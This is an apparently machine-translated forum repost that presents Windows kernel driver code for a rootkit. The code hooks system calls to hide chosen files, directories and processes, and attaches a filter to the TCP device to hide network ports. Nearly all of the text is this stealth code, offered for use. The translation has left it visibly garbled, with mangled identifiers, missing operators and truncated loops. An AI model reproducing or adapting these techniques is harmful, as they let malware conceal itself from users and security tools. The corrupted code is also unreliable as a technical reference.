Hide any process, directory file, registry, port

xiaoxiao2021-03-06  78

Hide any process, directory file, registry, port

Hide any process, directory / file, registry, port

Find Process, Directory / File, Registry and other operating systems will eventually call ZWQueryDirectoryFile, ZwQuerySystemInformation,

ZwxxValueKey and other functions. To intercept these functions to achieve hidden purposes, you need to implement the above functions, and modify one of the system maintenance.

Syscall Escapes the function that is predefined in advance. Because the syscall table is not visible in the user layer, I have to write Drive under Ring 0.

Can be modified. There is already a detailed introduction to how to modify the article, which is not detailed. (You can see Sysinternals.com or Webcrazy "

Written article). The lookup port is a TDI query. TDI exports two devices // device // TCP and // device // UDP. We can benefit

Write a Drive by the device filtering drive to take over all IRP packets of the two devices to proceed to the lower drive. Reach

The purpose of hiding any port. The method mentioned above is not a new thing, it is already old technologies in N years ago. Hey, it is now posted it out.

Enrich the top floor, irrigation and water. Don't read it. Here is the hidden process, directory / file, port code snippet in my Drive.

(The registry operation is written in Regmon, which is not listed here)

TypeDef struct _filetime

{

DWORD DWLOWDATETIME;

DWORD DWHIGHDATETIME;

} Filetime;

Typedef struct _direntry

{

DWORD DWLENTONEXT;

DWORD DWATTR;

Filetime FTCREATE, FTLASTACCESS, FTLASTWRITE

DWORD DWUNKNOWN [2];

DWORD DWFILESZELOW;

DWORD DWFILESIGH;

DWORD dwunknown2 [3];

Word wnamelen;

Word wunknown;

DWORD DWUNKNOWN3;

Word wshortnamelen;

Wchar SWSHORTNAME [12];

Wchar Suname [1];

Direntry, * pdirentry;

Struct _system_threads

{

Large_integer kernetime;

Large_integer usertime;

Large_integer createtime;

Ulong Waittime;

Pvoid ​​Startaddress;

Client_id clientis;

KPRIORITY PRIORITY

KPRIORITY BASEPRIORITY

Ulong contextswitchcount;

Ulong threadState;

Kwait_reason waitreason;

}

Struct _system_processes

{

Ulong nextentryDelta;

Ulong threadcount;

Ulong reserved [6];

Large_integer createtime;

Large_integer usertime;

Large_integer kernetime;

Unicode_string processname;

KPRIORITY BASEPRIORITY

Ulong processid;

Ulong inheritedFromProcessId;

Ulong handlecount;

Ulong reserved2 [2]; vm_counters vmcounters;

IO_COUNTERS IOCOUNTERS;

Struct _system_threads throughs [1];

}

// Hidden Directory / File

NTSTATUS HOOKZWQUERYDIRECTORYFILE

In Handle Hfile,

In Handle HEVENT OPTIONAL,

In Pio_APC_Routine IoapCroutine Optional,

In Pvoid ​​IoapcContext Optional,

OUT PIO_STATUS_BLOCK PIOSTATUSBLOCK,

Out pvoid fileinformationBuffer,

In Ulong FileinformationBufferlength,

IN file_information_class fileinfoclass,

In Boolean Breturnonlyneentry,

In Punicode_String Pathmask Optional,

In Boolean BrestartQuery)

{

NTSTATUS RC;

CHAR APROCESSNAME [80];

ANSI_STRING ANSIFILENAME, ANSIDIRNAME

Unicode_string unifilename;

PP_DIR PTR;

Wchar Parentdirectory [1024] = {0};

INT BYTESRETURNED;

PVOID Object;

// Execute the old ZwqueryDirectoryFile function

RC = ((zwquerydirectoryfile) (OldzwQueryDirectoryFile))

Hfile,

HEVENT,

IOAPCROUTINE,

IOAPCCONTEXT,

Piostatusblock,

FileInformationBuffer,

FileInformationBufferlength,

FileInfoclass,

BreturnonlyoneTry,

Pathmask,

BRESTARTQUERY);

IF (NT_Success (RC))

{

PDIRENTRY P;

PDIRENTRY PLAST;

Bool Blastone;

Int Found;

p = (pdirentry) fileinformationBuffer; // will find the result to assign a structure

Plast = NULL;

DO

{

Blastone =! (P-> dwlentonext);

RTLINITUNICODESTRING (& UNIFILENAME, P-> Suname);

RTLUNICODESTRINGTOANSISTRING (& AnsifileName, & UnifileName, True);

RTLUNICODESTRINGTOANSISTRING (& ANSIDIRNAME, & UNIFILENAME, TRUE);

RTLUPPERSTRING (& ANSIFILENAME, & ANSIDIRNAME);

Found = 0;

/ / Find if you contain the current directory in the list

For (ptr = list_head; ptr! = null; ptr = ptr-> Next)

{

IF (Ptr-> Flag! = PTR_HIDEDIR) Continue;

IF (RTLCompareMemory (ANSIFILENAME.BUFFER, PTR-> Name, Strlen (Ptr-> Name)) == Strlen (Ptr-> Name))

{

FOUND = 1;

Break;

}

} // end for

// If the list contains the current directory, hide if (Found)

{

IF (Blastone)

{

IF (p == (pdirentry) fileinformationBuffer

{

Rc = 0x8000000006; // Hide

}

Else

Plast-> DWLENTONEXT = 0;

Break;

}

Else

{

INT IPOS = (Ulong) P) - (Ulong) FileinformationBuffer;

INT ILEFT = (DWORD) FILEINFORMATIONBUFFERLENGTH - IPOS - P-> DWLENTONEXT;

RTLCopyMemory (PVOID) P, (PVOID) ((char *) p p-> dwlentonext), (DWORD) ILEFT);

CONTINUE;

}

}

Plast = P;

P = (PDIRENTRY) ((char *) P P-> dwlentonext);

} while (!!);

RTLFreeansString (& ANSIDIRNAME);

RTLFreeansString (& ANSIFILENAME);

}

Return (RC);

}

// Hidden process

NTSTATUS HOOKZWQUERYSYSTEMINFORMATION

In Ulong SystemInformationClass,

In Pvoid ​​SystemInformation,

In Ulong SystemInformationLength,

OUT Pulong ReturnLength)

{

NTSTATUS RC;

ANSI_STRING Process_name, process_uname, process_name1, process_name2;

Bool g_hide_proc = true;

CHAR APROCESSNAME [80];

PP_DIR PTR;

Int Found;

// Execute the old ZWQuerySystemInformation function

RC = ((zwQuerySystemInformation) (OldzwQuerySystemInformation))

SystemInformationClass,

SystemInformation,

SystemInformationLength,

ReturnLength;

IF (NT_Success (RC))

{

IF (g_hide_proc && (5 == systeminformationClass))

{

// will find the result to give the structure

Struct _system_processes * curr = (struct _system_processes *) SystemInformation;

Struct _system_processes * prev = null;

// Traverse process

While (Curr)

{

IF ((0 process_name.length))

{

Found = 0;

// Traverse

For (ptr = list_head; ptr! = null; ptr = ptr-> Next)

{

IF (Ptr-> Flag! = PTR_HIDEPROC) Continue;

IF (Memcmp (Process_name.buffer, Ptr-> Name, Strlen (Ptr-> Name)) == 0)

{

FOUND = 1;

}

}

// Judgment If it is the hidden process name, override this process name

While (Found) {

IF (prev)

{

IF (Curr-> NEXTENTRYDELTA)

{

Prev-> NEXTENTRYDELTA = CURR-> NEXTENTRYDELTA;

}

Else

{

Prev-> NEXTENTRYDELTA = 0;

}

}

Else

{

IF (Curr-> NEXTENTRYDELTA)

{

(char *) Systeminformation = curr-> nextentryDelta;

}

Else

{

Systeminformation = NULL;

}

}

IF (Curr-> NEXTENTRYDELTA) (CHAR *) CURR = CURR-> NEXTENTRYDELTA);

Else

{

Curr = NULL; BREAK;

}

// Traverse

Found = 0;

For (ptr = list_head; ptr! = null; ptr = ptr-> Next)

{

IF (Ptr-> Flag! = PTR_HIDEPROC) Continue;

IF (Memcmp (Process_name.buffer, Ptr-> Name, Strlen (Ptr-> Name)) == 0)

{

FOUND = 1;

}

}

}

}

IF (Curr! = null)

{

Prev = CURR;

IF (Curr-> NEXTENTRYDELTA) (CHAR *) CURR = CURR-> NEXTENTRYDELTA);

Else Curr = NULL;

}

}

}

}

Return (RC);

}

// Hide port

PDEvice_Object M_TcpGetDevice;

PDEvice_Object TcpDevice;

Unicode_string tcpDeviceName;

PDRIVER_OBJECT TCPDRIVER;

PDEvice_Object TCPGETDEVICE;

PDEvice_Object FilterDevice

PDRIVER_DISPATCH EMPTY;

NTSTATUS STATUS;

Empty = driverObject-> majorfunction [IRP_MJ_CREATE];

RTLINITUNICODESTRING (& TCPDeviceName, L "// device // tcp");

/ / Get existing equipment pointers

Status = IOGETDEVICEOBJECTPOINTER (& TCPDeviceName,

FILE_ALL_ACCESS,

& FileObject,

& TcpDevice

);

IF (! NT_Success (status))

{

DBGPrint ("IOGETDEVICEOBJECTPOINTER ERROR! / N");

Return status;

}

DBGPRINT ("IOGETDEVICEOBJECTPOINTER OK! / N");

// Establish a device

Status = IOCREATEVICE (DriverObject,

SIZEOF (Device_extension),

NULL,

File_Device_unknown,

0,

False,

& Filterdevice

);

IF (! NT_Success (status))

{

Return status;

}

// Add to equipment

TCPGETDEVICE = IoattachDeviceTodeviceStack (FilterDevice, TCPDevice);

IF (! tcpgetDevice) {

IodeleteDevice (FilterDevice);

DBGPrint ("IoattachDeventodeviceStack Error! / N");

Return status_success;

}

m_tcpgetDevice = tcpgetDevice;

/ / Add to the filter function

For (i = 0; i

{

IF ((tcpdriver-> majorfunction "&& (driverObject-> majorfunction [i] == empty))

{

DriverObject-> majorfunction [i] = passthrough;

}

}

ObdereferenceObject (fileObject);

NTSTATUS PASSTHROUGH (in PDEvice_Object DeviceObject, in PIRP IRP)

{

NTSTATUS STATUS;

PIO_STACK_LOCATION PIRPSTACK;

PirPstack = IOGETCURRENTIRPSTACKLOCATION (IRP);

// If you query, complete the IRP.

IF (pirpstack-> parameters.deviceioControl.iocontrolcode == query_information_ex)

{

/ / You can judge a port next step.

IRP-> iostatus.status = status_success;

IOCOMPLETEREQUEST (IRP, IO_NO_INCREMENT);

Return status_success;

}

// Copy the current IRP

IocopyCurrentirPstackLocationToneXT (IRP);

IOSetCompletionRoutine (IRP,

GenericCompletion,

NULL,

True,

True,

True

);

//transfer

Return IocallDriver (M_TcpGetDevice, IRP);

}

转载请注明原文地址:https://www.9cbs.com/read-121603.html

New Post(0)